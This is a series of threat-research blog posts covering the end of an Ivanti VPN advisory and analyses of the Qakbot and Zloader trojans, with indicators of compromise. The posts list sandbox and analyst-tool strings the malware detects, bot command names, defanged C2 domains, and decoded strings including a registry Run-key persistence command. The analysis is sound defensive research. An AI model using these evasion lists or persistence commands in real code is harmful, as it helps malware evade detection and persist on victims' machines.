Test your security posture: Get regular third-party risk assessments and conduct purple team activities to identify and harden the gaps in your security program. Request that your service providers and technology partners do the same and share the results of these reports with your security team.
Conclusion
In conclusion, Ivanti’s VPN products face severe security threats due to multiple zero-day vulnerabilities exploited by state-backed hackers. The initial disclosure revealed critical CVEs allowing unauthorized access and remote command injections. Following Ivanti’s patch release, two additional flaws enabling privilege escalation were swiftly exploited by the threat actors.
CISA has responded with an advisory and emergency directive, setting deadlines for mitigating the original issues. With the discovery of new vulnerabilities and the absence of patches, CISA issued a supplemental directive, mandating Federal agencies to disconnect Ivanti ICS and IPS solutions from networks by 11:59pm EST, February 2, 2024.
Fri, 02 Feb 2024 14:11:41 -0800Deepen Desaihttps://www.zscaler.com/blogs/security-research/threatlabz-coverage-advisory-ivanti-s-vpn-vulnerabilities-exploited-hackersTracking 15 Years of Qakbot Development
https://www.zscaler.com/blogs/security-research/tracking-15-years-qakbot-development
Introduction
Qakbot (aka QBot or Pinkslipbot) is a malware trojan that has been used to operate one of the oldest and longest running cybercriminal enterprises. Qakbot has evolved from a banking trojan to a malware implant that can be used for lateral movement and the eventual deployment of ransomware. In August 2023, the Qakbot infrastructure was dismantled by law enforcement. However, just several months later in December 2023, the fifth (and latest) version of Qakbot was released, marking more than 15 years of development. In this blog, we will analyze Qakbot from the first version dating back to 2008 through the most recent version that continues to be updated as of January 2024. Our analysis demonstrates the threat actor behind Qakbot is resilient, persistent, and innovative.
Key Takeaways
Qakbot originated in 2008 as a banking trojan designed to steal credentials and conduct ACH, wire, and credit card fraud.
In recent years, Qakbot has become an initial access broker delivering Cobalt Strike for lateral movement and ultimately resulting in second-stage infections including ransomware like BlackBasta.
Over the years, Qakbot’s anti-analysis techniques have improved to evade malware sandboxes, antivirus software, and other security products.
The malware is modular and can download plugins that enable it to dynamically add new functionality.
The threat group behind Qakbot has now released five distinct versions of the malware with the latest release in December 2023.
A Brief History of Qakbot
ThreatLabz researchers have been tracking Qakbot for more than a decade and our analysis started with samples that date back to 2008. These early versions of Qakbot contained a date timestamp rather than a version number. However, we will refer to these samples as version 1.0.0 for clarity and consistency with subsequent versions. At that time, Qakbot leveraged a dropper with two embedded components in the resource section that consisted of a malicious DLL and a tool to inject the DLL into running processes. The Qakbot DLL implemented a wide variety of features including: a SOCKS5 server, stealing passwords, harvesting web browser cookies, and spreading via SMB. These early versions were heavily developed and even had a feature to report crash dumps. In 2011, Qakbot introduced a versioning system that started with 2.0.0 that has signified major developmental milestones over time. The Qakbot major version number is a three-digit hexadecimal value with 0x500 (or 5.0.0) being the most recent.
Qakbot was largely used for banking fraud until 2019, when the threat actor pivoted to serving as an initial access broker for ransomware including Conti, ProLock, Egregor, REvil, MegaCortex, and BlackBasta.
The following timeline illustrates the key developments for each version of Qakbot.
Each version of Qakbot represents a snapshot in time and is indicative of the threat landscape during that period. For instance, early versions contained hardcoded command-and-control (C2) servers. As time progressed, law enforcement and malware researchers worked successfully with domain registrars to suspend malicious domains. In response, the Qakbot threat actor added network encryption and implemented a solution to remove the C2 server’s single point of failure by adding a domain generation algorithm (DGA). While a DGA addressed the single point of failure issue, it also created significant noise when querying for a large number of domains. As a result, the Qakbot developer devised a new multi-tiered architecture that leveraged compromised systems to act as proxy servers that relay network traffic between other infected systems and the backend C2 infrastructure. This design update addressed the single point of failure problem, reduced network traffic, and effectively hid the subsequent C2 tiers.
In the following sections, we will analyze key areas where Qakbot has evolved significantly including anti-analysis techniques, network communication, and the implementation of a modular design.
Anti-Analysis Techniques
Qakbot has implemented anti-analysis techniques from the beginning of its development including string obfuscation, API obfuscation, and malware sandbox evasion.
String obfuscation
Every version of Qakbot since its inception has obfuscated the malware’s important strings with a simple XOR algorithm. The XOR key (and most recently, the derivation of an XOR key) is used to decrypt strings. Moreover, the reference structure to the strings has also evolved across versions.
In the first two versions (1.0 and 2.0), the malware decrypted a block of strings from the data section, overwriting the original encrypted block, and the unencrypted strings remained in memory as shown in Figure 1. This simple design was likely an attempt to evade static antivirus signatures.
Figure 1. Early versions of Qakbot string obfuscation
In later versions of Qakbot, the XOR key length was significantly increased, and strings were decrypted and copied to a newly allocated buffer. Qakbot version 5.0 made perhaps the most significant change to the string encryption algorithm. The strings are still encrypted with a simple XOR key. However, the XOR key is no longer hardcoded in the data section. Instead the XOR key is encrypted with AES, where the AES key is derived by performing a SHA256 hash of a buffer. A second buffer contains the AES initialization vector (IV) as the first 16 bytes, followed by the AES-encrypted XOR key. Once the XOR key has been decrypted, the block of encrypted strings can then be decrypted as shown in Figure 2.
Figure 2. Qakbot 5.0 string decryption
API obfuscation
In versions 1 and 2, Qakbot carried a list of Windows API names used by the malware in the encrypted strings table. After the strings table was decrypted, the code would dynamically resolve the address of each API at runtime and then initialize a table of pointers that could then be used by Qakbot to invoke the corresponding function when required. This implementation made it harder for malware researchers and antivirus software to statically determine the APIs used at runtime.
In more modern versions, the Qakbot developer further obfuscated the use of APIs by resolving the imports using a CRC32 hash rather than a string. At first, Qakbot used the CRC hashes of the API name directly, and subsequent versions performed an XOR with a hardcoded value and the CRC hash. Figure 3 shows an example of this dynamic API import hashing algorithm.
Figure 3. Example Qakbot API obfuscation
Junk code
Over time, Qakbot has introduced blocks of code that are deliberately non-functional to defeat static antivirus signatures as shown in Figure 4. In the example below, a block of junk code was added prior to an RC4 initialization routine.
Figure 4. Example of Qakbot junk code block in an RC4 initialization function
Anti-sandbox techniques
Qakbot has implemented numerous detection mechanisms to identify researcher environments and malware sandboxes since the earliest versions. In particular, Qakbot has attempted to identify processes, system artifacts, and the underlying virtual machines associated with an analysis environment. Figure 5 shows an example of Qakbot’s implementation to identify whether an infected system is running on a VMWare virtual machine from a sample dating back to September 2009.
Figure 5. Qakbot implementation to identify VMWare
Qakbot has continuously added code to identify analysis environments by checking system information such as the name of BIOS vendors, processes, drivers, etc. for strings as shown in Table 1.
vmxnet
vmx_svga
vmrawdsk
vmdebug
vm3dmp
vSockets
srootkit
sbtisht
ansfltr
Xen
XENVIF
XENSRC
XENCLASS
XENBUS
Vmscsi
VirtualBox
Virtual Machine
Virtual HD
VirtIO
VRTUAL
VMware server memory
VMware SVGA
VMware SCSI
VMware Replay
VMware Pointing
VMware Accelerated
VMware
VMW
VMAUDIO
VIRTUAL-DISK
VBoxVideo
QEMU
PROD_VIRTUAL_DISK
MS_VM_CERT
CWSandbox
20202020
Table 1. Qakbot virtual machine string-based detections
The following processes in Table 2 are frequently used by malware analysts and are also detected by Qakbot:
frida-winjector-helper-32.exe
packetcapture.exe
filemon.exe
proc_analyzer.exe
sniff_hit.exe
frida-winjector-helper-64.exe
capturenet.exe
procmon.exe
sysAnalyzer.exe
sysAnalyzer.exe
tcpdump.exe
qak_proxy
idaq64.exe
sniff_hit.exe
BehaviorDumper.exe
windump.exe
dumpcap.exe
loaddll32.exe
joeboxcontrol.exe
processdumperx64.exe
ethereal.exe
CFF Explorer.exe
PETools.exe
joeboxserver.exe
anti-virus.EXE
wireshark.exe
not_rundll32.exe
ImportREC.exe
ResourceHacker.exe
sysinfoX64.exe
ettercap.exe
ProcessHacker.exe
LordPE.exe
x64dbg.exe
sctoolswrapper.exe
rtsniff.exe
tcpview.exe
SysInspector.exe
Fiddler.exe
sysinfoX64.exe
FakeExplorer.exe
apimonitor-x86.exe
idaq.exe
dumper64.exe
user_imitator.exe
Table 2. Malware analyst process names detected by Qakbot
Around version 404.510, the malware developer added extraneous exports to the Qakbot stager DLL to confuse malware sandboxes as shown in Figure 6. In this example, the export name Wind (or ordinal #458) is the actual entry point.
Figure 6. Qakbot 404.510 sample with 458 entries in the exports directory
Network Communication
Qakbot has leveraged HTTP for C2 communication from the beginning. However, the network protocol on top of HTTP has changed significantly over the years with encryption, RSA signature verification, and the addition of a JSON-based message format.
Network protocol and encryption
Qakbot has continuously updated its message protocol with version 19 being the latest. The protocol specifies the format of the message. In version 3, Qakbot sent requests in a format similar to the following:
However, this protocol format was later replaced with a JSON-based protocol with integer key values that denote specific fields as shown below:
This encoding adds a layer of obfuscation for each of the message fields.
Qakbot’s network encryption has used RC4 with the key consisting of 16 random bytes concatenated with a hardcoded salt and hashed using SHA1. The most recent version of Qakbot now uses AES encryption with the key consisting of 16 random bytes concatenated with a hardcoded salt and hashed using SHA256. After encryption, the data is Base64 encoded and prepended to a variable in the body of an HTTP POST request.
Domain generation algorithm
The first versions of Qakbot only used hardcoded C2s as shown in Figure 7.
Figure 7. Example of hardcoded Qakbot C2s
However, in version 2.0.1 a DGA was added as a backup C2 channel in the event that the hardcoded C2s were unreachable. Qakbot used a time-based DGA to generate up to 5,000 C2 domains for a specific date interval as shown in Figure 8.
Figure 8. Qakbot DGA code
Interestingly, some versions of Qakbot would generate fake domains if an analysis environment was detected in an effort to mislead researchers, as shown in Figure 9.
Figure 9. Example of Qakbot generating fake domains if network monitoring tools were detected
Data exfiltration to compromised FTP servers
Qakbot versions 3.0.0 and earlier used compromised FTP servers to exfiltrate data rather than sending the data directly to their C2 server. The FTP credentials were stored in Qakbot’s configuration files as shown below:
This design had an inherent weakness since anyone with the FTP credentials could potentially have accessed and recovered the stolen information. To address this weakness, Qakbot was later updated to send the stolen data directly to Qakbot’s C2 infrastructure.
Using compromised systems as relays
After version 3.2.4.8, Qakbot ceased using the DGA. Instead, Qakbot started using compromised systems themselves as C2 servers, and embedded a list of IP addresses and port numbers in the malware configuration. Before version 4.0.3.2, the configuration file (stored as an encrypted resource) contained the list of IP addresses in a text-based format:
However, after version 4.0.3.2, the Qakbot C2 list evolved into a binary format as shown in Figure 10.
Figure 10. Qakbot C2 list binary format
Commands
In the first versions of Qakbot, the server sent commands in a descriptive text-based format. The following commands were supported in Qakbot versions 1.0 and 2.0:
certssave
ckkill
cksave
clearvars
cron
cronload
cronsave
forceexec
ftpwork
getip
install3
instwd
kill
killall
loadconf
nbscan
psdump
reload
rm
saveconf
sleep
socks
sxordec
sxorenc
sysinfo
thkill
thkillall
uninstall
update
update_finish
uploaddata
var
wget
In order to obfuscate these commands, the Qakbot author replaced these string commands with integer values starting in the later builds of version 3.
Addition of RSA signature verification
Qakbot version 3.0.0.443 introduced RSA digital signatures (initially using the MatrixSSL library) to prevent tampering. This was especially important when the DGA and compromised systems were used as C2 servers.
Modular Structure
The design of Qakbot has changed significantly from versions 1 through 5. In particular, the malware has become more modular with the ability to dynamically add new features without releasing a new version of Qakbot. Modern versions use a lightweight stager responsible for initializing, maintaining persistence, and establishing C2 communication to request commands and modules.
Embedded resources
Prior to version 4.0.2.19, Qakbot frequently used the resource section to store configuration information (such as web injects and application parameters) as well as DLLs that performed malicious behavior. Initially, in version 1.0, these resources were not encrypted. However, Qakbot’s code evolved with various encryption algorithms to protect these resources.
Qakbot version 2.0 implemented a custom XOR-based algorithm as shown in Figure 11.
Figure 11. Custom encryption algorithm used by Qakbot 2.0 to protect resources
In this example, the offset 0x7 in the encrypted resource contained a WORD that was the size of the XOR key. The XOR key was located at offset 0x9 in the resource. Encrypted data was then concatenated after the XOR key. Python code that replicates this algorithm is shown below:
Qakbot version 3.0 and later used an RC4-based algorithm to decrypt the resources.
The initial 0x14 bytes in the resource served as the RC4 key for decrypting the remaining data. A slightly modified version of the BriefLZ library was later added to compress specific resources to reduce the overall file size.
In version 4.0.2.1, the resource encryption algorithm changed slightly. The first 0x14 bytes of the resource were no longer used as an RC4 key. Instead, the code contained a salt value in the encrypted strings table that was then hashed using SHA1 to derive the RC4 key used to decrypt the resource. In version 4.0.3.902 this was improved again, which added two layers of RC4 to decrypt the resource. The first RC4 layer was decrypted using the SHA1 hash of the salt string. The second layer used the first 0x14 bytes of the result as the key to decrypt the following data. Example Python code for this algorithm is shown below:
Plugins
In version 4.0.1, Qakbot was modified to split various functionality into separate modules. This allowed Qakbot to use a stager to download additional modules from Qabkot’s C2 servers to add functionality on-demand. Qakbot has built modules to hook web browsers, steal email addresses (and email), harvest stored credentials, deploy Cobalt Strike, and act as a C2 server that relays traffic between other infected systems and the backend infrastructure.
Conclusion
Qakbot is a sophisticated trojan that has evolved significantly over the past 15 years, and remains remarkably persistent and resilient. Despite the significant disruption to Qakbot in August 2023, the threat group remains active and recently updated their codebase to support 64-bit versions of Windows, improved the encryption algorithms, and added more obfuscation. This demonstrates that Qakbot will likely remain a threat for the foreseeable future and ThreatLabz will continue to add detections to protect customers.
Zscaler Cloud Sandbox
Zscaler’s multilayered cloud security platform detects payloads with the following threat names:
Win32.Banker.Qakbot
Indicators Of Compromise (IOCs)
Date
Version
Sample Hash
2008-08-28
1.0.0
34588857312371e4b789fb49d2606386
2009-11-16
1.0.0
8c33780752e14b73840fb5cff9d31ba1
2009-12-29
1.0.0
37bbdaf1d14efa438f9ff34d8eeaa5e7
2010-10-12
1.0.0.63
d02252d88c3eab14488e6b404d2534eb
2011-05-12
2.0.0.685
b9e23bc3e496a159856fd60e397452a0
2012-05-31
2.0.1.1432
570547fa75c15e6eb9e651f2a2ee0749
2013-07-08
2.0.1.1457
42e724dc232c4055273abb1730d89f28
2014-06-24
2.0.1.2544
9160ea12dbce912153b15db421bb87da
2015-01-28
2.0.1.2674
945ba16316c8a6a8428f0b50db0381dc
2015-12-17
3.0.0.116
dca0ef26493b9ac3172adf931f1a3499
2016-01-04
3.0.0.180
6718c6af4b89cffd9b6e0c235cf85bd2
2016-01-04
3.0.0.275
8fbb43dc853d0b95829112931493fe22
2016-01-13
3.0.0.262
72125013ac58d05adb32b7406b02c296
2016-01-29
3.0.0.322
3b4a2e984a51210d0594c9b555ba4e0d
2016-02-09
3.0.0.333
f952dc1e942ebdfb95a2347263265438
2016-02-12
3.0.0.352
b849381ab6a4e97d32580bb52d15cb7d
2016-03-08
3.0.0.443
dc8b137d5d61b23dbbb6085ce46bfcdb
2016-04-05
3.0.0.468
327a5e491d6db899d9db4c6bdc8f5367
2016-04-05
3.0.0.473
e3b0e54777ca9fd9863e3563a1b7dd59
2016-04-06
3.0.0.506
2e9261e75e15540ef88327a480a5b10e
2016-04-26
3.0.0.580
a472b9dd64198d739c6e415bbcae8a6f
2016-05-19
3.0.0.739
8609e6e4d01d9ef755832b326450cbe9
2016-06-01
3.0.0.743
a7cc19cde3a1a78b506410e4ffafdbef
2017-04-27
3.1.0.723
581016035f95327e7e1daac3ad55ae0e
2017-05-16
3.1.0.733
361d46f32a93786b34b2ac225efc0f79
2018-02-06
3.2.2.381
89e6f171c29255d6b4490774c630ad14
2019-09-16
3.2.3.91
ff186a1ef9e83c229940ff2dd4556eaf
2020-01-22
3.2.4.8
bea66da7088bd20adbfed57cf350a6a4
2020-01-22
3.2.4.8
1cd7a95064515625ad90464a65ea4d94
2020-03-03
3.2.4.53
08c51514a42eec6ccbbc7a09a8258419
2020-03-20
3.2.4.70
d8ff9d18cd622c545d21b199a2d17594
2020-04-01
3.2.4.75
2e658f5fa658651331cb5b16447bdbe2
2020-04-29
3.2.4.136
ca22283396dbe21fa2ef5e27c85ffae6
2020-05-07
3.2.4.141
e9d0e767a5c5284ab33a3bb80687cf63
2020-05-07
3.2.4.141
d8841201c9d32b5e885f4d035e32f654
2020-05-28
3.2.4.401
82d7c5ea49c97059bbec02161b36f468
2020-08-07
3.2.5.42
163ee88405bccc383c7b69c39028bf9a
2020-08-07
3.2.5.42
acf65632b7cdc40091daec58bf8830bc
2020-08-11
3.2.5.43
455c543243f5216e21ba045814311971
2020-08-11
3.2.5.43
cfc77e4421d830e73c6f6040a4baedd4
2020-11-03
3.2.5.83
40a9bdac882285ab844917d8b5b75188
2020-11-24
4.0.1.29
6b1771b883c0b3ffdc3f5923f45c1f93
2020-12-15
4.0.1.138
0a3caa2845251b8fb5ab72f450edd488
2021-03-12
4.0.1.194
4a6e7f055d5bf4fd6d2a401c1b3d18ab
2021-04-12
4.0.2.1
dc2acf1704456880208146c91692cfc8
2021-04-15
4.0.2.12
3ca1f0e708283f21c9a10ef4acf40990
2021-04-15
4.0.2.12
1e71ea79c5a70bb8c729037132855b5a
2021-04-22
4.0.2.12
66a87dbc24af866849646911f4841a28
2021-04-29
4.0.2.68
25984af48fa27ec36bd257f8478aa628
2021-04-29
4.0.2.68
c1849c1ee3b8146c6fb836dae0b64652
2021-05-06
4.0.2.68
d45e04df3c9270a01e9fb9e4e8006acc
2021-09-20
4.0.2.318
9a1c1497428743b4e199f2583f3d8390
2021-09-27
4.0.2.363
0865757dfe54c2d01c5cef5bfd3162c5
2021-09-27
4.0.2.363
c6dea1f4e6ee1ed4c0383cd1af456649
2021-11-03
4.0.3.1
1d4952cbe998312fd2bf810535db8a20
2021-11-03
4.0.3.1
6cce1ec83d1428de9fcb0c3791efabd1
2021-11-04
4.0.3.2
e111d982dc0c12f23fa3f446d674600b
2021-11-04
4.0.3.2
751f7d8ad6b2308cd1750fc23f606b53
2021-12-09
4.0.3.10
8bb4208a50c041f9cdfc26815905eab3
2022-02-10
4.0.3.490
bcb8e64c5a69c7a572ca34450712fb2f
2022-02-14
4.0.3.491
54e3f20f74c1089e89841798ffaac084
2022-02-14
4.0.3.503
95adeb6a1c1e0a9d9ee4ecafb6079b37
2022-02-15
4.0.3.509
da206d25fddf3286f42ec7626d8bb676
2022-02-18
4.0.3.532
3ba490216d4cdf92661444d896fefac3
2022-02-24
4.0.3.549
8fa26ff07c3b5e1653e55b8a567b7623
2022-02-24
4.0.3.549
1253695c63136edb1f6b37bbfd83db55
2022-04-06
4.0.3.573
2853985cab3c5b83eec38ae1f3a890be
2022-04-29
4.0.3.573
5e7deb4acb4429498693bc45db68978a
2022-05-04
4.0.3.674
2273dd59ca71c4f078cab09d93093294
2022-05-04
4.0.3.675
40d5e775a52c94842c97d012eb94efdc
2022-05-04
4.0.3.683
f1d47a4dc1d11b17e51419299dc282e4
2022-05-12
4.0.3.684
2f17bd9f4b9edd91a7fd80ef32981f70
2022-05-18
4.0.3.686
7dcbd74778754eee85810a4393d8e3ef
2022-05-18
4.0.3.688
e9e9d194f3ee9822852309cc83455eea
2022-05-23
4.0.3.689
019117f66e43de489b3ff56377f9907b
2022-05-24
4.0.3.690
28f84ffa14c7ef3936a00d3bd751bdb3
2022-06-07
4.0.3.694
d88ee89344d04f83eacd3614785560ef
2022-08-31
4.0.3.780
3ff9d9dbf8c7a6865faeb43188afa6b4
2022-09-06
4.0.3.858
3e86ac10b4e7d818e0f410130bb7f237
2022-09-08
4.0.3.860
377acb7149fdfa56c090d9a12619a53c
2022-09-15
4.0.3.892
e5ebdec7417ad847e4325c4114e41809
2022-09-20
4.0.3.894
c23d2cd7d10a5f88032ddfcab4cfe146
2022-09-28
4.0.3.895
050ce5fb25ffd3e907a5c81a6711fcea
2022-10-04
4.0.3.914
b857efb30d9e35bc83a294580ad8cc3a
2022-10-10
4.0.3.967
6dc027269262b93351633eb8af4623ef
2022-10-11
4.0.3.973
e5eb07b009ca666f91ef5fe48269ca52
2022-10-25
4.0.3.1051
0971b8e78fcc6f9158e279376116c8c4
2022-10-26
4.0.4.2
4fbebc9879ec1f95e759cb8b5d9fb89d
2022-10-28
4.0.4.14
66a0741f8f43b584e387459b367097c1
2022-10-31
4.0.4.20
6d61a88890be4ab5116cb712ff7788f4
2022-11-08
4.0.4.26
da75924c717524a8d17de126f8368ec4
2022-11-08
4.0.4.27
5971c4a485e881268ca28f24fdedc4e5
2022-11-16
4.0.4.30
22e45a212998d2ee264b6756b2972901
2022-11-28
4.0.4.46
accc6d9ba88040c89df34ef1749944d1
2022-12-13
4.0.4.52
22b3cb9b0bacd525a83aab5b1a853f63
2022-12-20
4.0.4.60
bebebd4e16a88f43f16e4c6c811c9894
2022-12-20
4.0.4.62
cafb7b2f8383cf9686f144dc2082f287
2022-12-22
4.0.4.66
6e3b4252903c0f3a153e011445ad2179
2023-01-31
4.0.4.432
3e3bc981a7fdbae10b40cd6683edacbb
2023-01-31
4.0.4.432
a12dd4324bbf1129d9fae1b3d1e6b9ca
2023-05-02
4.0.4.1035
ebec03d53d716cd780c92c5c29a95e6b
2023-05-10
4.0.4.1038
5e4c95b2c1b14a8a0f425576189fae60
2023-12-11
5.0.0.326
8aec3f3ef66e4ff118bfdab1d031eadb
2023-12-13
5.0.0.361
46e169516479d0614b663f302b5d1ace
2023-12-19
5.0.0.370
795319d48ce1f680699beb03317c6bff
2024-01-22
5.0.0.484
de1d9ed6da4f34b4444b13442aac5033
2024-01-22
5.0.0.486
f382d0f92221831eeb39c108f8ccfa26
Wed, 31 Jan 2024 08:31:01 -0800Javier Vicentehttps://www.zscaler.com/blogs/security-research/tracking-15-years-qakbot-developmentZloader: No Longer Silent in the Night
https://www.zscaler.com/blogs/security-research/zloader-no-longer-silent-night
Introduction
Zloader (aka Terdot, DELoader, or Silent Night), is a modular trojan born from the leaked Zeus source code. It surfaced publicly in 2016 during a targeted campaign against German banks1, but its malicious activity traces back to at least August 2015. Zloader’s first run persisted until the beginning of 2018 when its activities abruptly ceased. Its resurgence at the end of 2019, marketed in underground forums as “Silent Night”, came with substantial alterations. The evolution of Zloader progressed steadily, leading to the development of version 2.0.0.0 around September 2021. Similar to Qakbot, the threat actors using Zloader also pivoted from conducting banking fraud to ransomware. In April 2022, security researchers executed a takedown operation2 to dismantle the botnet leading to an extended period of inactivity.
After an almost two-year hiatus, Zloader reemerged with a new iteration that appears to have started development in September 2023. These new changes include new obfuscation techniques, an updated domain generation algorithm (DGA), RSA encryption for network communications, and the loader now has native support for 64-bit versions of Windows. Initially, this new version was labeled with the old version number 2.0.0.0. However, over the past several months, they released version 2.1.6.0 and 2.1.7.0. In this blog, we will explore these new updates to Zloader.
Key Takeaways
Zloader dates back to 2015 and has been advertised in underground cybercriminal forums under the name “Silent Night” since the end of 2019.
Zloader has returned after an almost two-year hiatus after being taken down in April 2022 by security researchers.
The new version of Zloader made significant changes to the loader module, which added RSA encryption, updated the domain generation algorithm, and is now compiled for 64-bit Windows operating systems for the first time.
Zloader continues to use junk code for obfuscation, as well as API import hashing and string encryption in an attempt to hinder malware analysis.
Technical Analysis
In the following sections, we dive into the technical details surrounding Zloader’s new updates to their anti-analysis techniques, embedded configuration, DGA, and network encryption.
Anti-analysis techniques
Zloader uses a combination of API import hashing, junk code, a filename check, and string obfuscation. The following sections analyze each technique.
Imports and API resolution
The newest Zloader samples only import a few functions from the kernel32 library. The remaining imports are resolved at runtime using checksums to obfuscate the functions that are used. This technique, already present in older versions, changes its implementation, adding an XOR constant which changes between samples. Python code that replicates the API hashing algorithm is shown below.
Code sample available on GitHub.
Junk code
Similar to previous versions, Zloader uses custom obfuscation. The new version of Zloader adds junk code that consists of various arithmetic operations, as shown in Figure 1 below.
Figure 1. Example Zloader 2.1 junk code
In Figure 1, the instructions inside the red box are the junk code.
Anti-sandbox
Each Zloader sample expects to be executed with a specific filename. If the filename does not match what the sample expects, it will not execute further. This could evade malware sandboxes that rename sample files. Figure 2 shows an example of a Zloader sample that expects its filename to be CodeForge.exe.
Figure 2. Example of Zloader’s anti-analysis filename check
ThreatLabz has observed Zloader use the following filenames:
CodeForge.exe
CyberMesh.exe
EpsilonApp.exe
FusionBeacon.exe
FusionEcho.exe
IonBeacon.dll
IonPulse.exe
KineticaSurge.dll
QuantumDraw.exe
SpectraKinetic.exe
UltraApp.exe
String obfuscation
Similar to prior versions, Zloader implements a string obfuscation algorithm for some of the malware’s important strings such as registry paths, DLL names, and the DGA’s top-level domain (TLD) using XOR with a hardcoded key. Python code that replicates the string obfuscation algorithm is shown below:
Code sample available on GitHub.
The encryption key differs between samples and is also hardcoded in the .rdata section as shown in Figure 3 below.
Figure 3. Example string obfuscation key used by Zloader
A list of Zloader’s obfuscated strings is shown in the Appendix.
Static configuration encryption and structure
The Zloader static configuration is still encrypted using RC4 with a hardcoded alphanumeric key, but the structure is slightly different. The botnet ID, campaign name, and command-and-control servers (C2s) are set at fixed offsets, in addition to an RSA public key that replaces the old RC4 key that was used for network encryption. ThreatLabz has observed 15 unique new Zloader samples and all of them have the same RSA public key, likely indicating there is currently only a single threat actor using the malware.
An example Zloader static configuration is shown below.
Domain generation algorithm
When the primary C2 server is not available, Zloader reverts to a DGA. The DGA algorithm has changed in the latest version and no longer contains a different seed per botnet. Python code that replicates Zloader’s new DGA algorithm is shown below.
Code sample available on GitHub.
The code generates 32 domains per day by using the local system time at midnight (converted to UTC) as a seed. Each of the DGA domains have a length of 20 characters followed by the “.com” TLD.
Network communications
Zloader continues to use HTTP POST requests to communicate with its C2 server. However, the network encryption is now using 1,024-bit RSA with RC4 and the Zeus “visual encryption” algorithms. Zloader uses the custom Zeus BinStorage format where the first 128 bytes are the RSA encrypted RC4 key (32 random bytes) and, the remaining bytes are encrypted with the RC4 key and visual encryption as shown in Figure 4:
Figure 4. Zloader BinStorage object for a hello message (prior to encryption)
The Zeus BinStorage structure uses an ID integer value to represent the information stored, followed by the length and data. The BinStorage ID values in this example are shown in Table 1.
Value (Decimal)
Value (Hexadecimal)
Description
10002
0x2712
Botnet ID
10025
0x2729
Campaign ID
10001
0x2711
Bot ID
10003
0x2713
Malware version
10006
0x2716
Unknown flag (set to 0x1)
Table 1. Zloader BinStorage hello message fields
ThreatLabz has observed samples containing the following botnet IDs:
Bing_Mod2
Bing_Mod3
Bing_Mod4
Bing_Mod5
All of the campaign IDs have been set to the value M1.
Conclusion
Zloader was a significant threat for many years and its comeback will likely result in new ransomware attacks. The operational takedown temporarily stopped the activity, but not the threat group behind it. Returning after almost two years, Zloader has brought notable improvements to the loader module such as RSA encryption, an updated DGA, and enhanced obfuscation techniques, with more junk code, API import hashing, and string encryption to thwart malware analysis.
Zscaler ThreatLabz continues to track this threat and add detections to protect our customers.
Zscaler Coverage
In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to Zloader at various levels with the following threat names:
Win64.Downloader.Zloader
Indicators Of Compromise (IOCs)
SHA256
Description
038487af6226adef21a29f3d31baf3c809140fcb408191da8bc457b6721e3a55
Zloader sample
16af920dd49010cf297b03a732749bb99cc34996f090cb1e4f16285f5b69ee7d
Zloader sample
25c8f98b79cf0bfc00221a33d714fac51490d840d13ab9ba4f6751a58d55c78d
Zloader sample
2cdb78330f90b9fb20b8fb1ef9179e2d9edfbbd144d522f541083b08f84cc456
Zloader sample
83deff18d50843ee70ca9bfa8d473521fd6af885a6c925b56f63391aad3ee0f3
Zloader sample
98dccaaa3d1efd240d201446373c6de09c06781c5c71d0f01f86b7192ec42eb2
Zloader sample
adbd0c7096a7373be82dd03df1aae61cb39e0a155c00bbb9c67abc01d48718aa
Zloader sample
b206695fb128857012fe280555a32bd389502a1b47c8974f4b405ab19921ac93
Zloader sample
b47e4b62b956730815518c691fcd16c48d352fca14c711a8403308de9b7c1378
Zloader sample
d92286543a9e04b70525b72885e2983381c6f3c68c5fc64ec1e9695567fb090d
Zloader sample
eb4b412b4fc58ce2f134cac7ec30bd5694a3093939d129935fe5c65f27ce9499
Zloader sample
f03b9dce7b701d874ba95293c9274782fceb85d55b276fd28a67b9e419114fdb
Zloader sample
f6d8306522f26544cd8f73c649e03cce0268466be27fe6cc45c67cc1a4bdc1b8
Zloader sample
fa4b2019d7bf5560b88ae9ab3b3deb96162037c2ed8b9e17ea008b0c97611616
Zloader sample
fbd60fffb5d161e051daa3e7d65c0ad5f589687e92e43329c5c4c950f58fbb75
Zloader sample
URL
Description
https://adslstickerhi[.]world
Zloader C2
https://adslstickerni[.]world
Zloader C2
https://dem.businessdeep[.]com
Zloader C2
Appendix
Tools
The code snippets in this blog have also been uploaded to our GitHub tools repository here.
Decoded strings
user32.dll
nbsp;
%s
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /t REG_SZ /v %s /d "%s"
wininet.dll
td
tr
br
Software\Microsoft\
h3
Local\
hr
POST
gdiplus.dll
NtWriteVirtualMemory
https://
*
\??\
ntdll.dll
ws2_32.dll
_alldiv
NtProtectVirtualMemory
NtGetContextThread
shell32.dll
%s %s
psapi.dll
crypt32.dll
S-1-15
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
_aulldiv
\"%s\"
samlib.dll
S:(ML;CIOI;NRNWNX;;;LW)
NtCreateThreadEx
regsvr32.exe /s \"%s\"
NtResumeThread
bcrypt.dll
netapi32.dll
RtlGetVersion
strtoul
winsta.dll
wldap32.dll
NtReadVirtualMemory
Basic
0:0
version.dll
h2
InstallDate
h5
NtAllocateVirtualMemory
.com
cabinet.dll
S:(ML;;NRNWNX;;;LW)
li
kernel32.dll
%s\tmp_%08x
h6
aeiouy
div
rpcrt4.dll
{%08X-%04X-%04X-%08X%08X}
iphlpapi.dll
mpr.dll
C:\Windows\System32\ntdll.dll
Connection: close
gdi32.dll
C:\Windows\System32\msiexec.exe
Global\
wtsapi32.dll
NtCreateUserProcess
shlwapi.dll
RtlUserThreadStart
%s
NtOpenProcess
HTTP/1.1
ncrypt.dll
INVALID_BOT_ID
_aullrem
Software\Microsoft\Windows\CurrentVersion\Run
dnsapi.dll
ole32.dll
.dll
C:\Windows\SysWOW64\msiexec.exe
bcdfghklmnpqrstvwxz
ftllib.dll
User metrics
ThreadStart
MSIMG32.dll
\*
JKLMNOPQRSTUVW$$$$$$XYZ[\]^_`abcdefghijklmnopq
h1
NtSetContextThread
*/*
GET
userenv.dll
urlmon.dll
Software\Microsoft\Windows NT\CurrentVersion
_ThreadStart@4
dxgi.dll
NtOpenSection
script
/post.php
advapi32.dll
h4
secur32.dll
imagehlp.dll
%s_%s_%X
winscard.dll
References
1 The Curious Case of an Unknown Trojan Targeting German-Speaking Users
2 Dismantling ZLoader: How malicious ads led to disabled security tools and ransomware | Microsoft Security Blog
